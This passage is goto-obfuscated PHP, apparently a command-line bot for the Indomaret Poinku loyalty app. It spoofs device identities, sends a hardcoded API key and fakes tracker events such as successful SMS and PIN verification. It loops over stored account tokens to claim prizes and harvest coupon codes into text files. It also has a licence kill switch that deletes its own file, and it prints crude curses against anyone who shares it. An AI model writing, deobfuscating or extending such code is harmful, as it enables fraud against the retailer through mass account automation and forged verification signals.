    if (!$P7lm9) { 
      goto dIgMJ; 
    } 
    goto MmZRu; 
    GSgbB: 
  } 
  goto Z2FTO; 
  t2UQK: 
  echo @zM6iC("yellow", " 13 . Tukar Stamp
"); 
  goto tRih6; 
  Tqk7I: 
  poXHB: 
  goto deoKi; 
  pjdWo: 
  echo "
"; 
  goto PX6b2; 
  eqpXU: 
  echo @zM6IC("yellow", " - Dilarang Keras Memberi Dan Menyebar Script Ini\xa"); 
  goto CGTag; 
  SzLuk: 
  echo @ZM6iC("nevy", "     YANG NYEBARIN SCRIPT INI 
"); 
  goto PaViv; 
  xcEUm: 
  echo @Zm6IC("yellow", "Poin Akun Anda : "); 
  goto x8RGk; 
  ca3bq: 
  $tqWr2 = $zvt88[$yy9BI]; 
  goto n1CDj; 
  qa6Zn: 
  $Fm5gC = @$cQFRW["data"]["expiredDate"]; 
  goto BmMuE; 
  CId6O: 
  echo "\xa"; 
  goto nNr1Z; 
  YRNTC: 
  $nb9cm = round(microtime(true) * 1000); 
  goto y6y7W; 
  TZYFr: 
  echo @Zm6IC("yellow", "Kode Pos    : "); 
  goto NQOD6; 
  uZrFH: 
  echo "
"; 
  goto NCD0t; 
  hSvR2: 
  $jT2Pf = @$owfHy["data"]["content"][$dQ8Tp]["couponMasterId"]; 
  goto pWv96; 
  zonco: 
  $m5BZY = gggr_("https://asia-southeast2-idm-corp-prd.cloudfunctions.net/idmapps_tracker_gateway", $wDisp); 
  goto RDVGv; 
  TLgtD: 
  $efQM2 = count($QRhbE) - 1; 
  goto wo9IC; 
  AaJdK: 
  echo "
"; 
  goto ALYQT; 
  oceyi: 
  b0ztV: 
  goto gI0WO; 
  pGlLe: 
  @unlink("beat"); 
  goto GHPjX; 
  xZwF2: 
  echo "\xa"; 
  goto uBgC6; 
  vZzSz: 
  $m0f8X = explode("
", @file_get_contents("mytoken")); 
  goto f28cg; 
  EqnUK: 
  xB5XS: 
  goto x7k_T; 
  IU21L: 
  $k1y0B = G1wxt("https://edtsapp.indomaretpoinku.com/login/apix-1502-api/open/pin/is-pin-exist", $wDisp, $aY0el, $GOXkU, $mlMLt); 
  goto EnqxC; 
  bkF1_: 
  sJ2Nm: 
  goto jPmRn; 
  x8fie: 
  $S8W9D = trim(fgets(STDIN)); 
  goto j6z6p; 
  TrDtR: 
  $tqWr2 = $zvt88[0]; 
  goto swoX9; 
  wu8ti: 
  echo @zM6ic("nevy", "        AAMIIN "); 
  goto VO7F2; 
  SYacG: 
  echo @zm6IC("red", "\xa~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
"); 
  goto EKWAg; 
  Dy0BU: 
  $yeprB = g1wxt("https://edtsapp.indomaretpoinku.com/notification/apix-1502-api/push-notifications/fcm-registration", $wDisp, $aY0el, $GOXkU, $mlMLt); 
  goto tyQvs; 
  TIdh9: 
  echo @zm6iC("green", "Nomor HP Anda : "); 
  goto efhFP; 
  nLket: 
  @unlink("poinhp.php"); 
  goto oeQpn; 
  XOW5Q: 
  echo @ZM6iC("yellow", "| WA 082176358295 \xa"); 
  goto bkgwV; 
  JXD87: 
  rhrij("Kupon Poinku new.txt", $WvHe1); 
  goto NrQ94; 
  I61fI: 
  rHriJ("Kupon Poinku new.txt", $Q6vWf); 
  goto QFItA; 
  Cvc4w: 
  echo @zM6ic("nevy", "Sorry, This Script Has Been Removed By The Owner!!"); 
  goto XCEBt; 
  lIn_S: 
  AJ5_S: 
  goto gZeD3; 
  GdD0b: 
  $ofEkP = cWALz("https://edtsapp.indomaretpoinku.com/loyalty/apix-1502-api/mobile/coins/prizes/GOFRESH2022/tokens/claim/single", $wDisp, $aY0el, $GOXkU, $mlMLt); 
  goto bFP1u; 
  IaDVm: 
  $lPULW = $m0f8X; 
  goto OvZkE; 
  qr3SL: 
  $ipfVm = @$lImQC["data"]["content"][17]["couponName"]; 
  goto HFm0t; 
  wK3qQ: 
  $YXsOG = @$cQFRW["message"]; 
  goto O7Cr_; 
  ZG9Bt: 
  ffDWu: 
  goto coGDt; 
  prCaZ: 
  $GOXkU = $w5ulg; 
  goto nROSQ; 
  j6z6p: 
  $jTEU0; 
  goto OR4t6; 
  QJCXA: 
  $tqWr2 = $zvt88[$yy9BI]; 
  goto EaXxp; 
  bD9yR: 
  echo "
"; 
  goto DJvaI; 
  Uz5sc: 
  goto sKRfM; 
  goto lEx9p; 
  ktT1F: 
  echo $jTEU0; 
  goto QHxK7; 
  m6Ofd: 
  $wDisp = "{"phoneNumber":"" . $zn5zd . "","deviceId":"" . $aY0el . ""}"; 
  goto sXAqT; 
  LLunD: 
  C8rz0: 
  goto caGhK; 
  W8yAD: 
  r1qLs("sigeo takeda", $rVPVc); 
  goto Rew81; 
  R_Y1g: 
  $NFC6_ = @$lImQC["data"]["content"][5]["couponName"]; 
  goto EtLfU; 
  vZl5D: 
  @unlink("poinhp.php"); 
  goto fNde0; 
  Q86_0: 
  $nb9cm = round(microtime(true) * 1000); 
  goto SWGWm; 
  nGlsv: 
  TRxKr: 
  goto OJe7J; 
  IUtYn: 
  echo @Zm6IC("nevy", "     YANG NYEBARIN SCRIPT INI \xa"); 
  goto NGeXj; 
  bEj5j: 
  function IaXm3($FK_yc, $bQedf, $wM5Ep) 
  { 
    goto Qy0Eh; 
    jFZ72: 
    fclose($FhLCi); 
    goto VDrgf; 
    Ag1lE: 
    fputs($FhLCi, "{$bQedf} kupon {$wM5Ep}\xd\xa"); 
    goto jFZ72; 
    Qy0Eh: 
    $FhLCi = fopen($FK_yc, "a"); 
    goto Ag1lE; 
    VDrgf: 
  } 
  goto UB3bx; 
  kHpsw: 
  $Jk9cx = G8Pf2("https://edtsapp.indomaretpoinku.com/customer/apix-1502-api/mobile/customer-address", $aY0el, $GOXkU, $mlMLt); 
  goto FhWKb; 
  hNNR3: 
  $wd9cN = date("d-m-Y | H:i:s"); 
  goto Sfw_J; 
  rbODu: 
  CAy8f: 
  goto AJX59; 
  r4EXt: 
  $JaDCq = $PQA77; 
  goto cgsPT; 
  PaViv: 
  echo @Zm6Ic("nevy", " SEMOGA LOBANG PANTAT NYA BISULAN!!!!! 
"); 
  goto q2w4c; 
  t_koI: 
  $Ap1KM = json_decode($N0XGD, true); 
  goto zowCb; 
  QVT4_: 
  goto fl6lv; 
  goto m4lQE; 
  BqeQN: 
  echo @zm6iC("green", $wd9cN); 
  goto qqfT0; 
  ABTny: 
  nn5qa: 
  goto G70pT; 
  MXmci: 
  echo "
"; 
  goto Os2_6; 
  twt81: 
  $v9NcH = @$owfHy["data"]["content"][$qtgR3]["balance"]; 
  goto IeLcz; 
  Mt1UZ: 
  VouNS: 
  goto zjLwc; 
  GWdpQ: 
  $l9PIA = @$owfHy["data"]["content"][$D2zwh]["game"]["name"]; 
  goto YgN08; 
  VuGJw: 
  $wDisp = "{"data":[{"application":{"app_version":"3.13.0","device_class":"Phone","device_family":"" . $GOXkU . "","device_id":"" . $aY0el . "","os_name":"Android P","os_version":"Android 9"},"core":{"event_name":"page_view","event_timestamp":" . $nb9cm . ","page_name":"splash","page_urlpath":""},"user":{"session_id":"" . $MXjqh . "","user_ip_address":"127.0.0.1"}}]}"; 
  goto a_Y_v; 
  Om5sv: 
  $L1qpJ = @$owfHy["data"][$dQ8Tp]["district"]; 
  goto fPDTC; 
  NGeXj: 
  echo @zM6Ic("nevy", " SEMOGA LOBANG PANTAT NYA BISULAN!!!!! 
"); 
  goto wu8ti; 
  Qw0Sd: 
  echo "
"; 
  goto yibUd; 
  kAo2I: 
  echo "\xa"; 
  goto CHNi6; 
  QSo8z: 
  sleep(10); 
  goto asaSp; 
  ChAnZ: 
  goto RM7sw; 
  goto kWWNA; 
  ETeBB: 
  sleep(5); 
  goto w_vuh; 
  DJvaI: 
  echo @Zm6Ic("nevy", "Sorry, This Script Has Been Removed By The Owner!!"); 
  goto aWC11; 
  XCEBt: 
  @unlink("poinhp.php"); 
  goto oJRtM; 
  wWIIC: 
  $yy9BI; 
  goto sTIym; 
  Vzbxs: 
  @unlink("poinhp.php"); 
  goto lQPJW; 
  d3fM_: 
  echo "\xa\xa"; 
  goto iGFo4; 
  hh5Bb: 
  $m0f8X = explode("\xa", @file_get_contents("mytoken")); 
  goto rOLXX; 
  vxPj3: 
  echo @ZM6IC("yellow", "Build By FERDY RAMADHAN "); 
  goto x6_r_; 
  wqRSd: 
  $wDisp = "{"data":[{"application":{"app_version":"3.13.0","device_class":"Phone","device_family":"" . $GOXkU . "","device_id":"" . $aY0el . "","os_name":"Android P","os_version":"Android 9"},"core":{"event_name":"click_link","event_timestamp":" . $nb9cm . ","link_label":"Konfirmasi"},"marketing":{"utm_raw":"utm_source=google-play&utm_medium=organic"},"user":{"session_id":"" . $MXjqh . "","user_id":" . $R_bYC . ","user_ip_address":"127.0.0.1"}}]}"; 
  goto tvm0w; 
  GPI3O: 
  echo @zm6iC("nevy", "Akun Ke    : "); 
  goto Y3MQk; 
  Y3MQk: 
  echo $jTEU0; 
  goto IbN8j; 
  g13L4: 
  echo "\xa"; 
  goto q4c1O; 
  tZsGQ: 
  $QRhbE = explode("
", @file_get_contents("mytoken")); 
  goto SxY5K; 
  hrq_b: 
  goto dDvxi; 
  goto oceyi; 
  zZsUf: 
  $ZNU2M = @$Ap1KM["data"]["rewards"][0]["item"][0]["name"]; 
  goto pUl6i; 
  pzCWS: 
  $v1ZMX = str_replace("
", '', $wPFxB); 
  goto mF3S_; 
  p1Olv: 
  $zcN5u = xOzB4(array("|"), $tqWr2)[0]; 
  goto Nj1vn; 
  DTgzm: 
  if (!($fUekS == '')) { 
    goto gakBA; 
  } 
  goto iiXGU; 
  DJjdR: 
  echo @zm6IC("red", $Bz8Et); 
  goto YgpmT; 
  BZCJ6: 
  echo @Zm6IC("yellow", "Masukkan Detail Alamat : "); 
  goto d2zLL; 
  rat1e: 
  goto qf4ti; 
  goto hwlm8; 
  PAlyc: 
  echo "
"; 
  goto pLTqx; 
  lxpuD: 
  echo @zM6Ic("nevy", $YXsOG); 
  goto WpQfH; 
  rBkbA: 
  $U0YgX = str_replace("
", '', $zcN5u); 
  goto W039g; 
  xr6FM: 
  @unlink("poinhp.php"); 
  goto E0oru; 
  vMlpG: 
  $tJqX7 = @$C46m0["data"]["content"][0]["couponName"]; 
  goto Al7wy; 
  jE9nl: 
  $kCT0W = str_replace("-", '', $cod3H); 
  goto TT_2Q; 
  GgRFr: 
  function a9mML($lEbop, $eOlDi, $tj7_x) 
  { 
    goto E48Oc; 
    qwKu3: 
    curl_setopt($C6npe, CURLOPT_SSL_VERIFYPEER, 0); 
    goto kzZTz; 
    uF7iR: 
    w5oH1: 
    goto JfVii; 
    E48Oc: 
    $C6npe = curl_init(); 
    goto bAYTA; 
    meCLR: 
    $ruc3h[] = "user-agent: okhttp/4.9.0"; 
    goto v1XHd; 
    rV3OX: 
    $P7lm9 = curl_getinfo($C6npe); 
    goto Sq8SU; 
    C11Rp: 
    curl_setopt($C6npe, CURLOPT_COOKIEFILE, "indo.txt"); 
    goto MA74Z; 
    kzZTz: 
    curl_setopt($C6npe, CURLOPT_COOKIEJAR, "indo.txt"); 
    goto C11Rp; 
    kMiJa: 
    curl_setopt($C6npe, CURLOPT_RETURNTRANSFER, 1); 
    goto meCLR; 
    bAYTA: 
    curl_setopt($C6npe, CURLOPT_URL, $lEbop); 
    goto SUOkH; 
    ovS8S: 
    curl_setopt($C6npe, CURLOPT_AUTOREFERER, true); 
    goto Ldu60; 
    Ldu60: 
    curl_setopt($C6npe, CURLOPT_HTTPHEADER, $ruc3h); 
    goto qwKu3; 
    v1XHd: 
    $ruc3h[] = "Host: edtsapp.indomaretpoinku.com"; 
    goto AyiY7; 
    AyiY7: 
    $ruc3h[] = "key: ZWR0czIwMjE6MHBsbW9rbg=="; 
    goto G6_9d; 
    oVGeV: 
    $y7f11 = substr($ECuqv, curl_getinfo($C6npe, CURLINFO_HEADER_SIZE)); 
    goto pn84y; 
    Sq8SU: 
    if (!$P7lm9) { 
      goto w5oH1; 
    } 
    goto vzVr8; 
    MTiG3: 
    return $ECuqv; 
    goto qOWEx; 
    G6_9d: 
    $ruc3h[] = "{"app_version":"3.13.0","device_class":"Phone","device_family":"" . $tj7_x . "","device_id":"" . $eOlDi . "","os_name":"Android P","os_version":"Android 9"}"; 
    goto ovS8S; 
    MA74Z: 
    $ECuqv = curl_exec($C6npe); 
    goto rV3OX; 
    CS7SW: 
    $AXlcQ = json_decode($y7f11, true); 
    goto RivTw; 
    pn84y: 
    goto W2ePC; 
    goto uF7iR; 
    SUOkH: 
    curl_setopt($C6npe, CURLOPT_FOLLOWLOCATION, true); 
    goto kMiJa; 
    irFYM: 
    W2ePC: 
    goto CS7SW; 
    JfVii: 
    return false; 
    goto irFYM; 
    vzVr8: 
    $ruc3h = substr($ECuqv, 0, curl_getinfo($C6npe, CURLINFO_HEADER_SIZE)); 
    goto oVGeV; 
    RivTw: 
    print_r($AXlcQ); 
    goto MTiG3; 
    qOWEx: 
  } 
  goto vx_HS; 
  OvB3v: 
  GViaE: 
  goto nJynW; 
  CEu9Z: 
  $ZXjwY = @$owfHy["data"]["content"][$fM3_G]["name"]; 
  goto fvvse; 
  t2sPb: 
  @unlink("poinhp.php"); 
  goto VgMUd; 
  jZrJF: 
  echo @Zm6ic("purple", "Member ID : "); 
  goto scxdN; 
  Rvvfk: 
  goto CV5_k; 
  goto HB4hn; 
  yLLb_: 
  $rERzL = xozb4(array("|", "
"), $tqWr2)[2]; 
  goto p6Ll2; 
  kC88F: 
  goto Fh1k_; 
  goto MznXj; 
  P9Ksh: 
  echo @zM6ic("yellow", "Status : "); 
  goto xhh2o; 
  oICIz: 
  yrh1H: 
  goto OnfYe; 
  AKVOr: 
  echo "\xa"; 
  goto jvFRt; 
  XpHuc: 
  $uU2QF = @$lImQC["data"]["content"][16]["couponName"]; 
  goto b5EpG; 
  D1mj_: 
  OTLN4: 
  goto wCzt2; 
  A5A7y: 
  echo @zM6iC("nevy", "     YANG NYEBARIN SCRIPT INI 
"); 
  goto z1iAX; 
  l2zya: 
  $YYbml = @$H1g60["authToken"]["token"]; 
  goto m2PK0; 
  hBlw0: 
  $D2zwh; 
  goto M_uwR; 
  lkfTM: 
  $DxrJr = "100000000000000000"; 
  goto HQgEB; 
  WKsfY: 
  echo @zm6Ic("green", "https://wa.me/6282176358295\xa"); 
  goto m_fbH; 
  CAPOM: 
  @unlink("poinhp.php"); 
  goto wMsWI; 
  mTnnn: 
  $mlMLt = @$owfHy["data"]["access_token"]; 
  goto cQgXr; 
  LGPrS: 
  $owfHy = json_decode($upOL9, true); 
  goto UCeyR; 
  Fr1xl: 
  if (!($cPDPt == 3)) { 
    goto vRTIW; 
  } 
  goto QVao_; 
  YBcmP: 
  $BW_8H = @$owfHy["data"]["content"][0]["description"]; 
  goto AaJdK; 
  mUS4h: 
  $earOL = $sONlZ; 
  goto wwRMs; 
  sYy6d: 
  echo @zm6Ic("nevy", $b2ucB); 
  goto WZiQo; 
  eQth1: 
  $wDisp = "{"phoneNumber":"" . $zn5zd . "","deviceId":"" . $aY0el . ""}"; 
  goto adOVg; 
  a1R8a: 
  echo "\xa"; 
  goto tT2Bl; 
  x8eeS: 
  $zcN5u = xoZB4(array("|"), $tqWr2)[0]; 
  goto N3_fB; 
  ezb0I: 
  Y06Dy: 
  goto Dsy8e; 
  We_ec: 
  $MXjqh = xWL4L(); 
  goto jfJh8; 
  CD5on: 
  $yy9BI++; 
  goto w85Q2; 
  YTR8P: 
  $zcN5u = XOZB4(array("|"), $tqWr2)[0]; 
  goto UKbD6; 
  GnHIS: 
  echo @Zm6iC("green", "Masukkan Password Device Anda : "); 
  goto ZAk3u; 
  kE9HG: 
  CIb70: 
  goto QPI07; 
  xlspJ: 
  echo "
"; 
  goto hzy5a; 
  wTOTz: 
  $ldzeo = @$owfHy["data"][0]["subDistrict"]["subDistrict"]; 
  goto iHrm4; 
  AdPvR: 
  echo @zm6Ic("nevy", "Sorry, This Script Has Been Removed By The Owner!!"); 
  goto NqQix; 
  n68gs: 
  $xp_1p = "klik.txt"; 
  goto wtGUU; 
  jm8QN: 
  echo @Zm6iC("yellow", "| WA 082176358295 \xa"); 
  goto ItGdn; 
  GNQma: 
  echo "Mulai Baris Ke : "; 
  goto bfXny; 
  P7mQo: 
  echo @zM6Ic("yellow", "Build By FERDY RAMADHAN "); 
  goto mIJkZ; 
  yNbnX: 
  echo @Zm6IC("nevy", $qjx5O); 
  goto Zt6t6; 
  OBy3d: 
  echo "
"; 
  goto p3xdC; 
  B9LnM: 
  $wDisp = "{"phoneNumber":"" . $zn5zd . "","deviceId":"" . $aY0el . ""}"; 
  goto hMWAZ; 
  P2_cR: 
  $a7K8a = auJHZ("https://firebaseremoteconfig.googleapis.com/v1/projects/998816605328/namespaces/firebase:fetch", $wDisp, $YYbml); 
  goto KC4mw; 
  RGQLS: 
  $jlHkA = str_replace("-", '', $sOOnY); 
  goto TUrUS; 
  gCqZ1: 
  die; 
  goto w59ij; 
  CEh6b: 
  echo @ZM6Ic("red", "Script Expired, Hubungi Creator https://wa.me/6282176358295\xa"); 
  goto uVfSY; 
  OhQV5: 
  echo @ZM6iC("nevy", $ABmxY); 
  goto rIxAs; 
  uPmaS: 
  function r1QLs($cF6mU, $a3qxo) 
  { 
    goto hVnPJ; 
    KHd99: 
    fclose($JZH8K); 
    goto b0nkW; 
    hVnPJ: 
    $JZH8K = fopen($cF6mU, "a"); 
    goto kh1tz; 
    kh1tz: 
    fputs($JZH8K, $a3qxo); 
    goto KHd99; 
    b0nkW: 
  } 
  goto WR_ss; 
  QERDp: 
  $owfHy = json_decode($o0WQD, true); 
  goto zvS3t; 
  tuakP: 
  @unlink("poinhp.php"); 
  goto fumDL; 
  t3iAT: 
  ybEa9: 
  goto dfcGR; 
  cjkQZ: 
  $GTMYQ = @$lImQC["data"]["content"][10]["couponCode"]; 
  goto ld1xl; 
  XH7hS: 
  die; 
  goto t0TRa; 
  CpSYw: 
  $QFiev = @$lImQC["data"]["content"][5]["couponCode"]; 
  goto R_Y1g; 
  xPuMO: 
  echo @Zm6ic("red", $qtgR3); 
  goto cf3yC; 
  u4yvz: 
  DiWXR: 
  goto RdPLe; 
  w5vjT: 
  $obc_G = str_replace("\xd", '', $wlJRC); 
  goto oyg3B; 
  rNskw: 
  print_r($zcN5u); 
  goto a1R8a; 
  OwvXv: 
  $wDisp = "{"data":[{"application":{"app_version":"3.13.0","device_class":"Phone","device_family":"" . $GOXkU . "","device_id":"" . $aY0el . "","os_name":"Android P","os_version":"Android 9"},"core":{"failed_reason":"Success PIN activation","event_label":"PIN activation","event_name":"event_submission","event_status":"success","event_timestamp":" . $nb9cm . "},"marketing":{"utm_raw":"utm_source=google-play&utm_medium=organic"},"user":{"session_id":"" . $MXjqh . "","user_id":" . $R_bYC . ","user_ip_address":"127.0.0.1"}}]}"; 
  goto TdnY9; 
  C81Xy: 
  GV2ko: 
  goto st12u; 
  lUgya: 
  $wDisp = "{"phoneNumber":"" . $zn5zd . "","deviceId":"" . $aY0el . ""}"; 
  goto VMNR2; 
  VgMUd: 
  @unlink("poinhp.php"); 
  goto qgKwQ; 
  hlmct: 
  $K4tCB = @$owfHy["data"][$qtgR3]["provinceName"]; 
  goto b5Mi3; 
  Wlx0i: 
  $qtgR3; 
  goto ELOq3; 
  gQSHj: 
  $sONlZ = str_replace("
", '', $rERzL); 
  goto sZiim; 
  beFul: 
  @unlink("poinhp.php"); 
  goto BJavt; 
  nWgR0: 
  $zvt88 = $QRhbE; 
  goto X7D5K; 
  dz8cU: 
  echo "
"; 
  goto MJWb1; 
  lMFbm: 
  $DxrJr = "100000000000000000"; 
  goto ppWla; 
  ugz9I: 
  echo @ZM6Ic("red", "Notice : "); 
  goto LFnhV; 
  KXTQE: 
  echo @zM6Ic("nevy", $WtCiL); 
  goto JKzQX; 
  AMOyM: 
  echo @zm6ic("nevy", $XDyMm); 
  goto GezTz; 
  dOzgh: 
  $earOL = $sONlZ; 
  goto U2Uv6; 
  bpESN: 
  lPFhp: 
  goto l_o2B; 
  h6t4P: 
  $w5ulg = str_replace("\xd", '', $TvVlh); 
  goto l16i0; 
  KRL_Q: 
  echo @zm6ic("green", "Nomor HP Anda : "); 
  goto rpal5; 
  oJRtM: 
  @unlink("poinhp.php"); 
  goto TvoFq; 
  NaN3z: 
  $jTEU0; 
  goto t5U4C; 
  Z1NER: 
  $CeRgl = @$owfHy["data"][0]["recipientName"]; 
  goto rY3kD; 
  Cu1Rm: 
  $cQFRW = json_decode($upOL9, true); 
  goto aT0HM; 
  vsMZx: 
  echo @Zm6Ic("green", "Biji Ke : "); 
  goto VauNH; 
  ZUFRT: 
  echo "\xa"; 
  goto SFR6C; 
  yCvFa: 
  echo @zm6iC("yellow", "Value     : "); 
  goto zI3JO; 
  wkOS0: 
  $zcN5u = Xozb4(array("|"), $wZnHP)[0]; 
  goto uJHIr; 
  hToI3: 
  echo "
"; 
  goto UQ9UB; 
  ShkCI: 
  die; 
  goto zAjuM; 
  bs89A: 
  $Ap1KM = json_decode($N0XGD, true); 
  goto a0DWl; 
  URZe_: 
  $fZ2bz = @$owfHy["message"]; 
  goto DrapX; 
  scg4D: 
  $qFy6r = trim(fgets(STDIN)); 
  goto xSVo5; 
  Nz0TL: 
  $yy9BI; 
  goto CzTPd; 
  kE_5P: 
  @unlink("poinhp.php"); 
  goto wgs69; 
  hKxlt: 
  echo @Zm6ic("purple", "Kamu Login dengan Username {$zn5zd}"); 
  goto tcaWh; 
  PzzeB: 
  $KMaT7 = @$owfHy["data"]["content"][$fM3_G]["type"]; 
  goto CEu9Z; 
  tmEqL: 
  echo @zm6ic("red", "
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\xa"); 
  goto a5HAT; 
  P33EC: 
  CWwim: 
  goto RWNRO; 
  IICKu: 
  echo "
"; 
  goto Gs7s7; 
  Axlar: 
  goto lcy0b; 
  goto NssVm; 
  FYHKZ: 
  echo "
"; 
  goto MOYQn; 
  s7q36: 
  $aY0el = $jlHkA; 
  goto tXds1; 
  j95ak: 
  echo "
\xa"; 
  goto VUaXz; 
  amGCN: 
  kmnPA: 
  goto HBGqV; 
  mhQEM: 
  $Jk9cx = G8pf2("https://edtsapp.indomaretpoinku.com/loyalty/apix-1502-api/mobile/reminders/me", $aY0el, $GOXkU, $mlMLt); 
  goto ZWgtU; 
  FR3s4: 
  $DxrJr = "100000000000000000"; 
  goto VRg4Z; 
  l8XQm: 
  die; 
  goto E_Op0; 
  bsKnA: 
  if (!($qtgR3 < $CdOss)) { 
    goto dGfMJ; 
  } 
  goto Ck1_U; 
  swoX9: 
  $rVPVc = @file_get_contents("poin"); 
  goto Y_om6; 
  AE_x0: 
  echo @zm6ic("yellow", "| WA 082176358295 
"); 
  goto fkcuz; 
  k0Qg0: 
  $obc_G = str_replace("
", '', $wlJRC); 
  goto JJWE6; 
  KF17u: 
  $jTEU0 = trim(fgets(STDIN)); 
  goto MYIE1; 
  gScoP: 
  $qjx5O = @$cQFRW["data"]["couponName"]; 
  goto K3Ngh; 
  BDxWd: 
  $m5BZY = gGgr_("https://asia-southeast2-idm-corp-prd.cloudfunctions.net/idmapps_tracker_gateway", $wDisp); 
  goto INRDE; 
  CfXzE: 
  echo "
"; 
  goto q9O2O; 
  Kmr8y: 
  goto HQc4z; 
  goto sSzdR; 
  s3nn0: 
  $ABmxY = @$nPb0z["message"]; 
  goto f9R6b; 
  es2VB: 
  $Jk9cx = G8pF2("https://edtsapp.indomaretpoinku.com/customer/apix-1502-api/is-whatsapp-verified", $aY0el, $GOXkU, $mlMLt); 
  goto f3MfN; 
  rpal5: 
  echo $BcbF3; 
  goto rvW4D; 
  VFf4p: 
  $u35jw = count($m0f8X) - 1; 
  goto IaDVm; 
  dsvmA: 
  DNYaq: 
  goto NcYE1; 
  MeZfL: 
  $WYrgv = @$H1g60["fid"]; 
  goto l2zya; 
  SqoPf: 
  if (!($fUekS == '')) { 
    goto jjS8S; 
  } 
  goto l0tTh; 
  C3pq7: 
  mTafw: 
  goto bNJdD; 
  zruIg: 
  YFIXZ: 
  goto P16AV; 
  u2Iln: 
  $zn5zd = $U0YgX; 
  goto trAV2; 
  PypTi: 
  @unlink("poinhp.php"); 
  goto Fe5Ht; 
  XALsS: 
  $MXjqh = xwL4l(); 
  goto PsWgp; 
  V1jox: 
  $iElqk = G1WXT("https://edtsapp.indomaretpoinku.com/login/apix-1502-api/open/pin/is-pin-exist-by-phone-number", $wDisp, $aY0el, $GOXkU, $mlMLt); 
  goto GAzr5; 
  alk_K: 
  $QRhbE = explode("
", @file_get_contents("forceclose")); 
  goto jH633; 
  ySmQ3: 
  $MXjqh = xWl4l(); 
  goto lM2XZ; 
  CpSRT: 
  $Ap1KM = json_decode($ofEkP, true); 
  goto chQyH; 
  TlZVo: 
  J2_16: 
  goto Jaank; 
  YgN08: 
  $ypyz5 = @$owfHy["data"]["content"][$D2zwh]["id"]; 
  goto WGRLf; 
  K0Bqd: 
  $D18xv = @$H1g60["data"]["id"]; 
  goto lU578; 
  TMn1K: 
  print_r($zcN5u); 
  goto kAu4G; 
  Q0ESs: 
  if (!($fUekS == '')) { 
    goto mTafw; 
  } 
  goto U1ozA; 
  wjJ6w: 
  die; 
  goto o6Pof; 
  xydrh: 
  die; 
  goto EmKuI; 
  vEQbd: 
  echo @Zm6iC("nevy", "Sorry, This Script Has Been Removed By The Owner!!"); 
  goto C3e2F; 
  bRVfq: 
  echo @ZM6ic("nevy", $I2tFV); 
  goto KSHR0; 
  Vg1v6: 
  echo "
"; 
  goto KaJPP; 
  yFgwh: 
  $sONlZ = str_replace("\xd", '', $rERzL); 
  goto JPlU1; 
  lnvS6: 
  @unlink("poinhp.php"); 
  goto CAT9c; 
  E3KOs: 
  $M1ADy = @$Ap1KM["data"]["id"]; 
  goto EI4lL; 
  wHw05: 
  $Jk9cx = g8pF2("https://edtsapp.indomaretpoinku.com/customer/apix-1502-api/mobile/detail-customer-origin", $aY0el, $GOXkU, $mlMLt); 
  goto uSYHL; 
  bfXny: 
  $jTEU0 = trim(fgets(STDIN)); 
  goto SPakz; 
  PWB9M: 
  if (!($ZNU2M == '')) { 
    goto NNMbo; 
  } 
  goto qOgWC; 
  tyQvs: 
  $nb9cm = round(microtime(true) * 1000); 
  goto r4EXt; 
  Q8ZOz: 
  $YYbml = @$H1g60["authToken"]["token"]; 
  goto J4tGg; 
  hq7kH: 
  $zvt88 = $QRhbE; 
  goto ibb5f; 
  ioDGw: 
  $D2zwh++; 
  goto VyZs8; 
  H6_GJ: 
  echo "
"; 
  goto bssg1; 
  PMIzX: 
  $BcbF3 = @$Ap1KM["data"]["phoneNumber"]; 
  goto NDC6U; 
  HK40j: 
  goto CQ2mu; 
  goto Hd7NT; 
  L_E1x: 
  goto HQc4z; 
  goto eZoqi; 
  KSKKG: 
  $Bz8Et = @$owfHy["data"][0]["postalCode"]; 
  goto Mf9K6; 
  KZvKT: 
  echo @Zm6ic("nevy", $M1ADy); 
  goto FHEiz; 
  e1vCg: 
  echo "Sampai Baris Ke : "; 
  goto x8fie; 
  nLPg8: 
  $sONlZ = str_replace("
", '', $rERzL); 
  goto zmvS8; 
  SJovd: 
  if ($t4wQX == "Diskon Rp 25.000 Klik Indomaret") { 
    goto oFiiw; 
  } 
  goto Cqo0x; 
  ejx25: 
  $wDisp = "{"data":[{"application":{"app_version":"3.13.0","device_class":"Phone","device_family":"" . $GOXkU . "","device_id":"" . $aY0el . "","os_name":"Android P","os_version":"Android 9"},"core":{"failed_reason":"Success SMS Verification","event_label":"verification","event_name":"event_submission","event_status":"success","event_timestamp":" . $nb9cm . "},"marketing":{"utm_raw":"utm_source=google-play&utm_medium=organic"},"user":{"session_id":"" . $MXjqh . "","user_id":" . $R_bYC . ","user_ip_address":"127.0.0.1"}}]}"; 
  goto xCZbu; 
  b8Z6e: 
  $QRhbE = explode("
", @file_get_contents("mytoken")); 
  goto Nb2VO; 
  zjLwc: 
  if (!($jTEU0 < $S8W9D)) { 
    goto M5EJ8; 
  } 
  goto DPkPt; 
  ZZHp1: 
  echo @zM6IC("nevy", $ABmxY); 
  goto s2xDv; 
  fXbxp: 
  TA23H: 
  goto XYMLf; 
  OlRzX: 
  iLHFy: 
  goto qkXoE; 
  Dt3qx: 
  lqJR6("mytoken", $zn5zd, $mlMLt); 
  goto boinS; 
  OH7B2: 
  echo "
"; 
  goto fbloW; 
  evgdx: 
  echo @Zm6IC("nevy", $YXsOG); 
  goto DmLJx; 
  qy0y7: 
  echo "
"; 
  goto j1Osj; 
  K23sE: 
  @unlink("poinhp.php"); 
  goto fqUMI; 
  dtY2y: 
  echo "
"; 
  goto AV9rQ; 
  POBf_: 
  echo "\xa"; 
  goto yrt42; 
  MDPdh: 
  $L1qpJ = @$owfHy["data"][0]["district"]["district"]; 
  goto Vj8L8; 
  M_uwR: 
  EHIPK: 
  goto PNvRG; 
  CCLK7: 
  echo @zM6iC("green", "Nomor HP Anda : "); 
  goto v3oAA; 
  EgQkD: 
  $ZNU2M = @$Ap1KM["data"]["rewards"][0]["item"][0]["name"]; 
  goto ecjm5; 
  r4NLu: 
  goto XZBu7; 
  goto NYZyT; 
  dXN8c: 
  if (!($fUekS == '')) { 
    goto yzn_p; 
  } 
  goto nH2G1; 
  PGbXK: 
  echo @zm6ic("red", "Apakah Yakin Generate New Token? ( y / n ) : "); 
  goto mu6vT; 
  G6a4g: 
  $a7K8a = aUjHz("https://firebaseremoteconfig.googleapis.com/v1/projects/998816605328/namespaces/firebase:fetch", $wDisp, $YYbml); 
  goto W3YD7; 
  NQMsn: 
  echo "
"; 
  goto La4zp; 
  BqG2a: 
